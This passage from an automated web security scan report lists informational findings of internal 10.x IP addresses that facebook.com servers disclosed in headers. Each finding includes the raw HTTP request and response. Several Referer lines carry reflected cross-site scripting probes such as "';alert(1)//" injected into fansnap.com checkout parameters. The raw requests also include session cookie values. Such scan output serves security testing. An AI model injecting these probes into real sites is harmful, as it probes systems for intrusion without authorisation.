Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.159.32
X-Cnection: close
Date: Tue, 19 Jul 2011 18:48:42 GMT
Content-Length: 265

<script type="text/javascript">
parent.postMessage("cb=f161fabdc7d8a1e&origin=http\u00253A\u00252F\u00252Fbing.fansnap.com\u00252Ff3e57b37faf9558&relation=parent&transport=postmessage&frame=f2aeb7d36d
...[SNIP]...

24.204. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.222.31

Request

GET /extern/login_status.php?api_key=105579996199059&app_id=105579996199059&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df15cdfc84b56a52%26origin%3Dhttp%253A%252F%252Fwww.fansnap.com%252Ff17ef442c548c7%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df178ab2524b188%26origin%3Dhttp%253A%252F%252Fwww.fansnap.com%252Ff17ef442c548c7%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df19c94786796c52%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df241be2562ee3a%26origin%3Dhttp%253A%252F%252Fwww.fansnap.com%252Ff17ef442c548c7%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df19c94786796c52&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1d47ae2dd4c5e%26origin%3Dhttp%253A%252F%252Fwww.fansnap.com%252Ff17ef442c548c7%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df19c94786796c52&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1efcdc5ce35b4c%26origin%3Dhttp%253A%252F%252Fwww.fansnap.com%252Ff17ef442c548c7%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df19c94786796c52&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.fansnap.com/developers
Cookie: datr=i0EBThVgj6dG_aF4zAL0iwRb

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.222.31
X-Cnection: close
Date: Tue, 19 Jul 2011 18:44:20 GMT
Content-Length: 260

<script type="text/javascript">
parent.postMessage("cb=f1d47ae2dd4c5e&origin=http\u00253A\u00252F\u00252Fwww.fansnap.com\u00252Ff17ef442c548c7&relation=parent&transport=postmessage&frame=f19c94786796c
...[SNIP]...

24.205. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.138.56

Request

GET /extern/login_status.php?api_key=105579996199059&app_id=105579996199059&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2fef29c8e6a70c%26origin%3Dhttp%253A%252F%252Fbing.fansnap.com%252Ff9ff9c974dd38c%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df82f11d2b8d0c6%26origin%3Dhttp%253A%252F%252Fbing.fansnap.com%252Ff9ff9c974dd38c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2a1da7e6f03c38%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1c3ce23fcbf6aa%26origin%3Dhttp%253A%252F%252Fbing.fansnap.com%252Ff9ff9c974dd38c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2a1da7e6f03c38&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1e8e6b9e70b968%26origin%3Dhttp%253A%252F%252Fbing.fansnap.com%252Ff9ff9c974dd38c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2a1da7e6f03c38&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df30797641bff8c%26origin%3Dhttp%253A%252F%252Fbing.fansnap.com%252Ff9ff9c974dd38c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2a1da7e6f03c38&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/checkout/index/415814268?ctx=c%3Dtix%3Bmt%3Dint%3Btsp%3D0%3Bdt%3D2%3Blpos%3D0%3Bt%3Dbv&ch=bing&quantity=2&lp=true&poctx=rank%3D36%3BcrawlScore%3Dnull%3Bpop1%3D0.0374%3Bpop2%3D0.0374%3Bpop3%3D0.0374%3B&afm=44bca%27%3balert(document.location)//30702b33e3b&uet=-776896836%3A7925%3Apgstickets%7C%7Cbing%7Cmt%3Aint%3Bsz%3A1254%3Bid%3A389669
Cookie: datr=i0EBThVgj6dG_aF4zAL0iwRb

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.138.56
X-Cnection: close
Date: Tue, 19 Jul 2011 18:48:21 GMT
Content-Length: 263

<script type="text/javascript">
parent.postMessage("cb=f1e8e6b9e70b968&origin=http\u00253A\u00252F\u00252Fbing.fansnap.com\u00252Ff9ff9c974dd38c&relation=parent&transport=postmessage&frame=f2a1da7e6f0
...[SNIP]...

24.206. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.42.107.65

Request

GET /extern/login_status.php?api_key=111239619098&ok_session=http%3A%2F%2Fwww.bing.com%2Ffd%2Ffb%2Fu%3Fv%3D7_06_0_998904%26sId%3D0%23status%3Dconnected&no_session=http%3A%2F%2Fwww.bing.com%2Ffd%2Ffb%2Fu%3Fv%3D7_06_0_998904%26sId%3D0%23status%3DnotConnected&no_user=http%3A%2F%2Fwww.bing.com%2Ffd%2Ffb%2Fu%3Fv%3D7_06_0_998904%26sId%3D0%23status%3Dunknown&session_version=3&extern=2 HTTP/1.1
Host: www.facebook.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.bing.com/fd/fb/r?v=7_06_0_998904&sId=0
Cookie: datr=i0EBThVgj6dG_aF4zAL0iwRb

Response

HTTP/1.1 302 Found
Location: http://www.bing.com/fd/fb/u?v=7_06_0_998904&sId=0#status=unknown
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.42.107.65
X-Cnection: close
Date: Tue, 19 Jul 2011 23:01:15 GMT
Content-Length: 0

24.207. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.255.25

Request

GET /extern/login_status.php?api_key=111239619098&ok_session=http%3A%2F%2Fwww.bing.com%2Ffd%2Ffb%2Fu%3Fv%3D7_06_0_993063%26sId%3D0%23status%3Dconnected&no_session=http%3A%2F%2Fwww.bing.com%2Ffd%2Ffb%2Fu%3Fv%3D7_06_0_993063%26sId%3D0%23status%3DnotConnected&no_user=http%3A%2F%2Fwww.bing.com%2Ffd%2Ffb%2Fu%3Fv%3D7_06_0_993063%26sId%3D0%23status%3Dunknown&session_version=3&extern=2 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/fd/fb/r?v=7_06_0_993063&sId=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc; campaign_click_url=%2Fcampaign%2Flanding.php%3Fplacement%3Dpflo%26campaign_id%3D402047449186%26extra_1%3Dauto

Response

HTTP/1.1 302 Found
Location: http://www.bing.com/fd/fb/u?v=7_06_0_993063&sId=0#status=unknown
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.255.25
X-Cnection: close
Date: Tue, 19 Jul 2011 15:16:02 GMT
Content-Length: 0

24.208. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.113.30

Request

Response

HTTP/1.1 302 Found
Location: http://www.bing.com/fd/fb/u?v=7_06_0_993063&sId=0#status=unknown
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.113.30
X-Cnection: close
Date: Tue, 19 Jul 2011 14:57:06 GMT
Content-Length: 0

24.209. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.169.65

Request

GET /extern/login_status.php?api_key=105579996199059&app_id=105579996199059&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1d913d8e551ca%26origin%3Dhttp%253A%252F%252Fbing.fansnap.com%252Ff29ef8a9fad71a%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df322572de73613e%26origin%3Dhttp%253A%252F%252Fbing.fansnap.com%252Ff29ef8a9fad71a%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df38b9f3d1f4b262%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2d0067bc0c9ff4%26origin%3Dhttp%253A%252F%252Fbing.fansnap.com%252Ff29ef8a9fad71a%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df38b9f3d1f4b262&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df20134b7e9921fa%26origin%3Dhttp%253A%252F%252Fbing.fansnap.com%252Ff29ef8a9fad71a%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df38b9f3d1f4b262&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df32a97b5bfa8d2a%26origin%3Dhttp%253A%252F%252Fbing.fansnap.com%252Ff29ef8a9fad71a%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df38b9f3d1f4b262&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/checkout/index/415814268?ctx=c%3Dtix%3Bmt%3Dint%3Btsp%3D0%3Bdt%3D2%3Blpos%3D0%3Bt%3Dbv&ch=bing&quantity=22bf1d%3balert(1)//47ce35f909f&lp=true&poctx=rank%3D36%3BcrawlScore%3Dnull%3Bpop1%3D0.0374%3Bpop2%3D0.0374%3Bpop3%3D0.0374%3B&afm=&uet=-776896836%3A7925%3Apgstickets%7C%7Cbing%7Cmt%3Aint%3Bsz%3A1254%3Bid%3A389669
Cookie: datr=i0EBThVgj6dG_aF4zAL0iwRb

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.169.65
X-Cnection: close
Date: Tue, 19 Jul 2011 19:38:28 GMT
Content-Length: 263

<script type="text/javascript">
parent.postMessage("cb=f20134b7e9921fa&origin=http\u00253A\u00252F\u00252Fbing.fansnap.com\u00252Ff29ef8a9fad71a&relation=parent&transport=postmessage&frame=f38b9f3d1f4
...[SNIP]...

24.210. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.63.37.57

Request

GET /extern/login_status.php?api_key=111239619098&ok_session=http%3A%2F%2Fwww.bing.com%2Ffd%2Ffb%2Fu%3Fv%3D7_06_0_993063%26sId%3D0%23status%3Dconnected&no_session=http%3A%2F%2Fwww.bing.com%2Ffd%2Ffb%2Fu%3Fv%3D7_06_0_993063%26sId%3D0%23status%3DnotConnected&no_user=http%3A%2F%2Fwww.bing.com%2Ffd%2Ffb%2Fu%3Fv%3D7_06_0_993063%26sId%3D0%23status%3Dunknown&session_version=3&extern=2 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/fd/fb/r?v=7_06_0_993063&sId=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc; campaign_click_url=%2Fcampaign%2Flanding.php%3Fplacement%3Dpflo%26campaign_id%3D402047449186%26extra_1%3Dauto

Response

HTTP/1.1 302 Found
Location: http://www.bing.com/fd/fb/u?v=7_06_0_993063&sId=0#status=unknown
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.63.37.57
X-Cnection: close
Date: Tue, 19 Jul 2011 15:15:26 GMT
Content-Length: 0

24.211. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.103.64

Request

GET /extern/login_status.php?api_key=111239619098&ok_session=http%3A%2F%2Fwww.bing.com%2Ffd%2Ffb%2Fu%3Fv%3D7_06_0_993063%26sId%3D0%23status%3Dconnected&no_session=http%3A%2F%2Fwww.bing.com%2Ffd%2Ffb%2Fu%3Fv%3D7_06_0_993063%26sId%3D0%23status%3DnotConnected&no_user=http%3A%2F%2Fwww.bing.com%2Ffd%2Ffb%2Fu%3Fv%3D7_06_0_993063%26sId%3D0%23status%3Dunknown&session_version=3&extern=2 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/fd/fb/r?v=7_06_0_993063&sId=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc; campaign_click_url=%2Fcampaign%2Flanding.php%3Fplacement%3Dpflo%26campaign_id%3D402047449186%26extra_1%3Dauto

Response

HTTP/1.1 302 Found
Location: http://www.bing.com/fd/fb/u?v=7_06_0_993063&sId=0#status=unknown
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.103.64
X-Cnection: close
Date: Tue, 19 Jul 2011 18:31:54 GMT
Content-Length: 0

24.212. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.63.24.34

Request

Response

24.213. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.180.30

Request

GET /extern/login_status.php?api_key=105579996199059&app_id=105579996199059&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df274ee246b1a0fe%26origin%3Dhttp%253A%252F%252Fbing.fansnap.com%252Ff2e5d50ea7ff07%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df27c297e9751724%26origin%3Dhttp%253A%252F%252Fbing.fansnap.com%252Ff2e5d50ea7ff07%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df10b886d7c8bbe4%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1e16f3e898bcb8%26origin%3Dhttp%253A%252F%252Fbing.fansnap.com%252Ff2e5d50ea7ff07%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df10b886d7c8bbe4&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df235486733f3676%26origin%3Dhttp%253A%252F%252Fbing.fansnap.com%252Ff2e5d50ea7ff07%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df10b886d7c8bbe4&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2e23a039157222%26origin%3Dhttp%253A%252F%252Fbing.fansnap.com%252Ff2e5d50ea7ff07%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df10b886d7c8bbe4&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/checkout/index/418563179?ctx=c%3Dtix%3Bmt%3Dint%3Btsp%3D0%3Bdt%3D1%3Blpos%3D2b263b%27%3balert(1)//2660bb145a6&ch=bing&quantity=2&lp=true&poctx=rank%3D36%3BcrawlScore%3Dnull%3Bpop1%3D0.0374%3Bpop2%3D0.0374%3Bpop3%3D0.0374%3B&afm=&uet=-776896836%3A7925%3Apgstickets%7C%7Cbing%7Cmt%3Aint%3Bsz%3A1254%3Bid%3A389669
Cookie: datr=i0EBThVgj6dG_aF4zAL0iwRb

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.180.30
X-Cnection: close
Date: Tue, 19 Jul 2011 19:38:09 GMT
Content-Length: 263

<script type="text/javascript">
parent.postMessage("cb=f235486733f3676&origin=http\u00253A\u00252F\u00252Fbing.fansnap.com\u00252Ff2e5d50ea7ff07&relation=parent&transport=postmessage&frame=f10b886d7c8
...[SNIP]...

24.214. http://www.facebook.com/facebook previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/facebook

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.89.42

Request

Response

24.215. http://www.facebook.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/favicon.ico

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.101.47

Request

GET /favicon.ico HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; lsd=xZqF4; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fr.php; wd=1065x723

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=2592000
Content-Type: image/x-icon
Expires: Thu, 18 Aug 2011 14:57:17 GMT
X-FB-Server: 10.62.101.47
X-Cnection: close
Date: Tue, 19 Jul 2011 14:57:17 GMT
Content-Length: 152

.PNG
.
...IHDR................a..._IDAT8.c...?.%.LXG.8...I.g. U3..m@B.....}...$....,..5...\.h.@~G.?.?...h.\....m.......H....83Q...@..........IEND.B`.

24.216. http://www.facebook.com/find-friends previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/find-friends

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.95.36

Request

Response

24.217. http://www.facebook.com/help/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/help/

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.123.33

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: __utma=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmb=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmc=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmz=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fhelp%2F%3Fref%3Dpf; path=/; domain=.facebook.com
Set-Cookie: svid=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.123.33
X-Cnection: close
Date: Tue, 19 Jul 2011 14:57:54 GMT
Content-Length: 22399

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;window._script_path = "\/4oh4.php";window._EagleEyeSeed="af0Z";</script><noscript>
...[SNIP]...

24.218. http://www.facebook.com/images/contact_importer/login_button/yahoo.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/images/contact_importer/login_button/yahoo.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.85.47

Request

GET /images/contact_importer/login_button/yahoo.png HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/find-friends?ref=pf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; lsd=xZqF4; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fr.php; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fmobile%2F%3Fref%3Dpf

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=2592000
Content-Type: image/png
Expires: Thu, 18 Aug 2011 14:57:30 GMT
X-FB-Server: 10.62.85.47
X-Cnection: close
Date: Tue, 19 Jul 2011 14:57:30 GMT
Content-Length: 4029

.PNG
.
...IHDR.............!Q.t..
CiCCPICC profile..x..SwX...>..e.VB....l.."#....Y....a...@...
V....HU...
H....(.gA..Z.U\8.....}z............y.....&...j.9R.<:...OH......H.. ....g......yx~t.?...o...p
...[SNIP]...

24.219. http://www.facebook.com/images/loaders/indicator_black.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/images/loaders/indicator_black.gif

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.89.45

Request

GET /images/loaders/indicator_black.gif HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/facebook
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc; lsd=xZqF4; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fr.php; campaign_click_url=%2Fcampaign%2Flanding.php%3Fplacement%3Dpflo%26campaign_id%3D402047449186%26extra_1%3Dauto; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fhelp%2F%3Fref%3Dpf; wd=1065x723

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=2592000
Content-Type: image/gif
Expires: Thu, 18 Aug 2011 14:57:56 GMT
X-FB-Server: 10.62.89.45
X-Cnection: close
Date: Tue, 19 Jul 2011 14:57:56 GMT
Content-Length: 1996

GIF89a . ................!..NETSCAPE2.0.....!..XMP DataXMP<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61.134777, 2010/02/
...[SNIP]...

24.220. http://www.facebook.com/images/registration_graphic.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/images/registration_graphic.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.120.53

Request

GET /images/registration_graphic.png HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/r.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; lsd=xZqF4; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fr.php

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=2592000
Content-Type: image/png
Expires: Thu, 18 Aug 2011 14:57:15 GMT
X-FB-Server: 10.62.120.53
X-Cnection: close
Date: Tue, 19 Jul 2011 14:57:15 GMT
Content-Length: 1148

.PNG
.
